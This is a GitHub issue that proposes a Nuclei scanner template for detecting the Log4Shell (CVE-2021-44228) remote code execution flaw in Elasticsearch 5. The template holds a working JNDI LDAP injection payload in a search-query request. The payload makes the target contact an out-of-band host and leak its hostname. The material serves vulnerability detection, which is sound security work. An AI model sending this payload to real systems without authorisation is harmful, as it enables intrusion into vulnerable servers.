### ISSUE TITLE
Elasticsearch 5 - Log4j Remote Code Execution

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4829]
```yaml
id: elasticsearch-5-log4j-rce

info:
  name: Elasticsearch 5 - Log4j Remote Code Execution
  author: akincibor
  severity: critical
  description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted Elasticsearch 5.
  reference:
    - https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: jndi,log4j,rce,cve,cve2021,oast,elasticsearch

requests:
  - raw:
      - |
        GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output
```
